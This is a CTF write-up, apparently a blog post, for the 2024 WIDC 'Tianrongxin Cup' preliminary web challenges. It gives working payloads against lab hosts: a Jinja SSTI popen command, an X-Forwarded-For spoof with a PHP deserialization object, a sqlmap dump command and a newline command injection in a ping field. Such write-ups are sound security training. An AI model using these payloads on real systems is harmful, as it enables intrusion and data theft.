2024WIDC“天融信杯”信息安全挑战赛预赛

Day1-不安全的车企内网100

ssti

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /register HTTP/1.1
Host: 172.10.0.21:8000
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Referer: http://172.10.0.21:8000/
Origin: http://172.10.0.21:8000
Accept-Encoding: gzip, deflate
Content-Length: 89

user={{''.__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat ./flag/flag').read()}}&pwd=1323

Day1-升级认证平台100
http://172.10.0.17:1221//.idea/workspace.xml
idea泄露出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<project version="4">
<component name="ChangeListManager">
<list default="true" id="6dbcba93-3773-47f3-a52d-67ec58f933e8" name="Default Changelist" comment=""/>
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true"/>
<option name="SHOW_DIALOG" value="false"/>
<option name="HIGHLIGHT_CONFLICTS" value="true"/>
<option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false"/>
<option name="LAST_RESOLUTION" value="IGNORE"/>
</component>
<component name="FileEditorManager">
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/src/PPlab.php">
<provider selected="true" editor-type-id="text-editor"/>
</entry>
</file>
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/src/trueflag.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="34">
<caret line="7" column="22" selection-start-line="7" selection-start-column="22" selection-end-line="7" selection-end-column="22"/>
</state>
</provider>
</entry>
</file>
<file pinned="false" current-in-tab="false">
<entry file="file://$PROJECT_DIR$/src/index.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="425">
<caret line="30" column="14" selection-start-line="30" selection-start-column="14" selection-end-line="30" selection-end-column="14"/>
</state>
</provider>
</entry>
</file>
<file pinned="false" current-in-tab="true">
<entry file="file://$PROJECT_DIR$/.idea/workspace.xml">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="-1887"/>
</provider>
</entry>
</file>
</leaf>
</component>
<component name="ProjectFrameBounds" extendedState="6">
<option name="x" value="348"/>
<option name="y" value="80"/>
<option name="width" value="1400"/>
<option name="height" value="1000"/>
</component>
<component name="ProjectView">
<navigator currentView="Scope" currentSubView="Scope 'Project Files'; set:Project Files; class com.intellij.psi.search.scope.ProjectFilesScope" proportions="" version="1">
<foldersAlwaysOnTop value="true"/>
</navigator>
<panes>
<pane id="Scope">
<subPane subId="Scope 'Project Files'; set:Project Files; class com.intellij.psi.search.scope.ProjectFilesScope">
<expand>
<path>
<item name="phpstorm" type="3d21c010:ScopeViewTreeModel$ProjectNode"/>
<item name="" type="442cc68d:ScopeViewTreeModel$RootNode"/>
</path>
</expand>
<select/>
</subPane>
</pane>
<pane id="ProjectPane">
<subPane>
<expand>
<path>
<item name="phpstorm" type="b2602c69:ProjectViewProjectNode"/>
<item name="phpstorm" type="462c0819:PsiDirectoryNode"/>
</path>
<path>
<item name="phpstorm" type="b2602c69:ProjectViewProjectNode"/>
<item name="phpstorm" type="462c0819:PsiDirectoryNode"/>
<item name="src" type="462c0819:PsiDirectoryNode"/>
</path>
</expand>
<select/>
</subPane>
</pane>
</panes>
</component>
<component name="PropertiesComponent">
<property name="WebServerToolWindowFactoryState" value="false"/>
<property name="nodejs_interpreter_path.stuck_in_default_project" value="undefined stuck path"/>
<property name="nodejs_npm_path_reset_for_default_project" value="true"/>
</component>
<component name="RunDashboard">
<option name="ruleStates">
<list>
<RuleState>
<option name="name" value="ConfigurationTypeDashboardGroupingRule"/>
</RuleState>
<RuleState>
<option name="name" value="StatusDashboardGroupingRule"/>
</RuleState>
</list>
</option>
</component>
<component name="SvnConfiguration">
<configuration/>
</component>
<component name="TaskManager">
<task active="true" id="Default" summary="Default task">
<changelist id="6dbcba93-3773-47f3-a52d-67ec58f933e8" name="Default Changelist" comment=""/>
<created>1553763951288</created>
<option name="number" value="Default"/>
<option name="presentableId" value="Default"/>
<updated>1553763951288</updated>
<workItem from="1553763956877" duration="42000"/>
<workItem from="1553764362389" duration="33000"/>
</task>
<servers/>
</component>
<component name="TimeTrackingManager">
<option name="totallyTimeSpent" value="75000"/>
</component>
<component name="ToolWindowManager">
<frame x="66" y="-11" width="1855" height="1092" extended-state="6"/>
<layout>
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.25235197"/>
<window_info id="Structure" order="1" side_tool="true" weight="0.25"/>
<window_info id="Favorites" order="2" side_tool="true"/>
<window_info anchor="bottom" id="Message" order="0"/>
<window_info anchor="bottom" id="Find" order="1"/>
<window_info anchor="bottom" id="Run" order="2"/>
<window_info anchor="bottom" id="Debug" order="3" weight="0.4"/>
<window_info anchor="bottom" id="Cvs" order="4" weight="0.25"/>
<window_info anchor="bottom" id="Inspection" order="5" weight="0.4"/>
<window_info anchor="bottom" id="TODO" order="6"/>
<window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false"/>
<window_info anchor="bottom" id="Database Changes" order="8"/>
<window_info anchor="bottom" id="Version Control" order="9"/>
<window_info anchor="bottom" id="Terminal" order="10"/>
<window_info anchor="bottom" id="Event Log" order="11" side_tool="true"/>
<window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4"/>
<window_info anchor="right" id="Ant Build" order="1" weight="0.25"/>
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25"/>
<window_info anchor="right" id="Database" order="3"/>
</layout>
</component>
<component name="TypeScriptGeneratedFilesManager">
<option name="version" value="1"/>
</component>
<component name="editorHistoryManager">
<entry file="file://$PROJECT_DIR$/src/.idea/workspace.xml">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="493">
<caret line="29" column="14" lean-forward="true" selection-start-line="29" selection-start-column="14" selection-end-line="29" selection-end-column="14"/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/src/PPlab.php">
<provider selected="true" editor-type-id="text-editor"/>
</entry>
<entry file="file://$PROJECT_DIR$/src/trueflag.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="34">
<caret line="7" column="22" selection-start-line="7" selection-start-column="22" selection-end-line="7" selection-end-column="22"/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/src/index.php">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="425">
<caret line="30" column="14" selection-start-line="30" selection-start-column="14" selection-end-line="30" selection-end-column="14"/>
</state>
</provider>
</entry>
<entry file="file://$PROJECT_DIR$/.idea/workspace.xml">
<provider selected="true" editor-type-id="text-editor">
<state relative-caret-position="-1887"/>
</provider>
</entry>
</component>
</project>

flag在trueflag.php 源码在/PPlab.php

1
2
3
4
5
6
7
8
9
GET /PPlab.php HTTP/1.1
Host: 172.10.0.17:1221
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Chrome
X-Forwarded-For: 127.0.0.1

得到源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php
/**
 * Created by PhpStorm.
 * User: vvlab
 * Date: 22-12-27
 * Time: 下午5:38
 */
class show {
    public $filename;
    function printContent() {
        $content = file_get_contents($this->filename);
        echo $content;
    }
}
if ($_SERVER['HTTP_X_FORWARDED_FOR'] != '127.0.0.1') {
    echo 'Only Localhost can see';
    die();
} else if ($_SERVER['HTTP_USER_AGENT'] != 'Chrome') {
    echo 'Browser is not Chrome<br>';
    echo 'Please use Chrome browser!';
    die();
}
show_source(__FILE__);


$a = null;
if (isset($_POST['show'])) {
    $a = unserialize($_POST['show']);
    if (!is_object($a)||get_class($a) != 'show') {
        $a = new show();
        $a->filename = "text.txt";
    }

} else {
    $a = new show();
    $a->filename = "text.txt";
}
$a->printContent();
Hello, It doesn't seem to be here. Take a closer look
1
2
3
4
5
6
7
8
9
10
11
<?php
class show {
    public $filename= 'trueflag.php';
    function printContent() {
        $content = file_get_contents($this->filename);
        echo $content;
    }
}
$a = new show();
echo serialize($a);
//O:4:"show":1:{s:8:"filename";s:12:"trueflag.php";}

Day1-不安全的TSP平台

python .\sqlmap.py -l 1.txt -p "password" -D sql -T user -C flag --dump --time-sec=10 --batch --dbms=MySQL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /login.php HTTP/1.1
Host: 172.10.0.22
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Referer: http://172.10.0.22/
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Cache-Control: max-age=0
Origin: http://172.10.0.22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Length: 21
X-Forwarded-For: 127.0.0.1

username=admin&password=admin

Day1-车载通信协议

Day1-ping出强大

1
2
3
4
5
6
7
8
9
10
POST /index.php HTTP/1.1
Host: 172.10.0.15:49154
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded

ip=0.0.0.0%0An\l fl\ag.php

CTFs > 比赛Write Up
#比赛Write Up
2024WIDC“天融信杯”信息安全挑战赛预赛
http://example.com/2024/05/25/2024WIDC“天融信杯”信息安全挑战赛预赛/
作者
J_0k3r
发布于
2024年5月25日
许可协议
BY J_0K3R